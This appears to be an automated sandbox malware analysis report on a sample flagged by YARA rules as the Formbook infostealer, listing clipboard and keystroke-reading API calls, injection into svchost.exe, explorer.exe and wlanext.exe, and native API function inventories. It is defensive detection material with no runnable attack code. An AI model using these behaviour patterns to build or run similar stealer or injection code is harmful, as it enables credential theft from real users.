          Source: explorer.exe, 00000002.00000000.1660518211.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2694034395.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2784668773.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2781419371.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2771147402.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000002.2920536485.00000000078E7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000E.00000003.2775846720.00000000078E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F16B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F16B0C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F16D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00F16D07
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F16B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00F16B0C
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F02B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00F02B37
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F2F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00F2F7FF

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

          System Summary

          barindex
          Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.file.exe.e50000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.file.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1710607282.0000000002C90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2917669573.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1710343356.0000000002491000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2915545328.0000000000AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.1710630793.0000000002CC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.2917155311.0000000002E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.1654303454.0000000000E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: Process Memory Space: file.exe PID: 5324, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 5020, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: Process Memory Space: wlanext.exe PID: 2924, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: C:\Users\user\Desktop\file.exeCode function: This is a third-party compiled AutoIt script.0_2_00EC3D19
          Source: file.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: file.exe, 00000000.00000000.1643073757.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_2fef0498-7
          Source: file.exe, 00000000.00000000.1643073757.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f13b12ba-d
          Source: file.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_6828ed0c-9
          Source: file.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_24114dda-3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AD0 NtReadFile,LdrInitializeThunk,1_2_02F72AD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BF0 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_02F72BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B60 NtClose,LdrInitializeThunk,1_2_02F72B60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_02F72EA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E80 NtReadVirtualMemory,LdrInitializeThunk,1_2_02F72E80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FE0 NtCreateFile,LdrInitializeThunk,1_2_02F72FE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FB0 NtResumeThread,LdrInitializeThunk,1_2_02F72FB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F90 NtProtectVirtualMemory,LdrInitializeThunk,1_2_02F72F90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F30 NtCreateSection,LdrInitializeThunk,1_2_02F72F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CA0 NtQueryInformationToken,LdrInitializeThunk,1_2_02F72CA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_02F72DF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DD0 NtDelayExecution,LdrInitializeThunk,1_2_02F72DD0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D30 NtUnmapViewOfSection,LdrInitializeThunk,1_2_02F72D30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D10 NtMapViewOfSection,LdrInitializeThunk,1_2_02F72D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74340 NtSetContextThread,1_2_02F74340
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F74650 NtSuspendThread,1_2_02F74650
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AF0 NtWriteFile,1_2_02F72AF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72AB0 NtWaitForSingleObject,1_2_02F72AB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BE0 NtQueryValueKey,1_2_02F72BE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72BA0 NtEnumerateValueKey,1_2_02F72BA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72B80 NtQueryInformationFile,1_2_02F72B80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72EE0 NtQueueApcThread,1_2_02F72EE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72E30 NtWriteVirtualMemory,1_2_02F72E30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72FA0 NtQuerySection,1_2_02F72FA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72F60 NtCreateProcessEx,1_2_02F72F60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CF0 NtOpenProcess,1_2_02F72CF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72CC0 NtQueryVirtualMemory,1_2_02F72CC0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C70 NtFreeVirtualMemory,1_2_02F72C70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C60 NtCreateKey,1_2_02F72C60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72C00 NtQueryInformationProcess,1_2_02F72C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72DB0 NtEnumerateKey,1_2_02F72DB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F72D00 NtSetInformationFile,1_2_02F72D00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73090 NtSetValueKey,1_2_02F73090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73010 NtOpenDirectoryObject,1_2_02F73010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F735C0 NtCreateMutant,1_2_02F735C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F739B0 NtGetContextThread,1_2_02F739B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73D70 NtOpenThread,1_2_02F73D70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F73D10 NtOpenProcessToken,1_2_02F73D10
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AA330 NtCreateFile,1_2_024AA330
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AA3E0 NtReadFile,1_2_024AA3E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AA460 NtClose,1_2_024AA460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AA510 NtAllocateVirtualMemory,1_2_024AA510
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AA32C NtCreateFile,1_2_024AA32C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AA383 NtCreateFile,1_2_024AA383
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AA45A NtClose,1_2_024AA45A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AA50A NtAllocateVirtualMemory,1_2_024AA50A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AA58A NtAllocateVirtualMemory,1_2_024AA58A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_024AA58C NtAllocateVirtualMemory,1_2_024AA58C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E0A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,1_2_02E0A036
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E0A042 NtQueryInformationProcess,1_2_02E0A042
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BCE12 NtProtectVirtualMemory,2_2_0E5BCE12
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BB232 NtCreateFile,2_2_0E5BB232
          Source: C:\Windows\explorer.exeCode function: 2_2_0E5BCE0A NtProtectVirtualMemory,2_2_0E5BCE0A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00DDF267 CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,4_2_00DDF267
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2B60 NtClose,LdrInitializeThunk,4_2_032A2B60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_032A2BE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_032A2BF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2AD0 NtReadFile,LdrInitializeThunk,4_2_032A2AD0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2F30 NtCreateSection,LdrInitializeThunk,4_2_032A2F30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2FE0 NtCreateFile,LdrInitializeThunk,4_2_032A2FE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,4_2_032A2EA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_032A2D10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_032A2DF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2DD0 NtDelayExecution,LdrInitializeThunk,4_2_032A2DD0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2C60 NtCreateKey,LdrInitializeThunk,4_2_032A2C60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_032A2C70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_032A2CA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A35C0 NtCreateMutant,LdrInitializeThunk,4_2_032A35C0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A4340 NtSetContextThread,4_2_032A4340
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A4650 NtSuspendThread,4_2_032A4650
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2BA0 NtEnumerateValueKey,4_2_032A2BA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2B80 NtQueryInformationFile,4_2_032A2B80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2AB0 NtWaitForSingleObject,4_2_032A2AB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2AF0 NtWriteFile,4_2_032A2AF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2F60 NtCreateProcessEx,4_2_032A2F60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2FA0 NtQuerySection,4_2_032A2FA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2FB0 NtResumeThread,4_2_032A2FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2F90 NtProtectVirtualMemory,4_2_032A2F90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2E30 NtWriteVirtualMemory,4_2_032A2E30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2E80 NtReadVirtualMemory,4_2_032A2E80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2EE0 NtQueueApcThread,4_2_032A2EE0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2D30 NtUnmapViewOfSection,4_2_032A2D30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2D00 NtSetInformationFile,4_2_032A2D00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2DB0 NtEnumerateKey,4_2_032A2DB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2C00 NtQueryInformationProcess,4_2_032A2C00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2CF0 NtOpenProcess,4_2_032A2CF0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A2CC0 NtQueryVirtualMemory,4_2_032A2CC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A3010 NtOpenDirectoryObject,4_2_032A3010
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A3090 NtSetValueKey,4_2_032A3090
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A39B0 NtGetContextThread,4_2_032A39B0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A3D10 NtOpenProcessToken,4_2_032A3D10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_032A3D70 NtOpenThread,4_2_032A3D70
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00ABA3E0 NtReadFile,4_2_00ABA3E0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00ABA330 NtCreateFile,4_2_00ABA330
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00ABA460 NtClose,4_2_00ABA460
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00ABA510 NtAllocateVirtualMemory,4_2_00ABA510
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00ABA383 NtCreateFile,4_2_00ABA383
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00ABA32C NtCreateFile,4_2_00ABA32C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00ABA45A NtClose,4_2_00ABA45A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00ABA58A NtAllocateVirtualMemory,4_2_00ABA58A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00ABA58C NtAllocateVirtualMemory,4_2_00ABA58C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_00ABA50A NtAllocateVirtualMemory,4_2_00ABA50A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03099BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,4_2_03099BAF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0309A036 NtQueryInformationProcess,NtSuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,4_2_0309A036
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_03099BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,4_2_03099BB2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_0309A042 NtQueryInformationProcess,4_2_0309A042
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F06685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00F06685
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EFACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00EFACC5
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F079D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00F079D3
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EEB0430_2_00EEB043
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF410F0_2_00EF410F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE02A40_2_00EE02A4
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECE3B00_2_00ECE3B0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF038E0_2_00EF038E
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE06D90_2_00EE06D9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF467F0_2_00EF467F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F2AACE0_2_00F2AACE
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF4BEF0_2_00EF4BEF
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EECCC10_2_00EECCC1
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ECAF500_2_00ECAF50
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC6F070_2_00EC6F07
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F231BC0_2_00F231BC
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EED1B90_2_00EED1B9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDB11F0_2_00EDB11F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF724D0_2_00EF724D
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE123A0_2_00EE123A
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED32000_2_00ED3200
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC93F00_2_00EC93F0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F013CA0_2_00F013CA
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDF5630_2_00EDF563
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC96C00_2_00EC96C0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F0B6CC0_2_00F0B6CC
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00F2F7FF0_2_00F2F7FF
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC77B00_2_00EC77B0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EF79C90_2_00EF79C9
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDFA570_2_00EDFA57
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC9B600_2_00EC9B60
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00ED3B700_2_00ED3B70
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC7D190_2_00EC7D19
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EE9ED00_2_00EE9ED0
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EDFE6F0_2_00EDFE6F
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00EC7FA30_2_00EC7FA3
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0116EE500_2_0116EE50
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FC02C01_2_02FC02C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02FE02741_2_02FE0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030003E61_2_030003E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F4E3F01_2_02F4E3F0
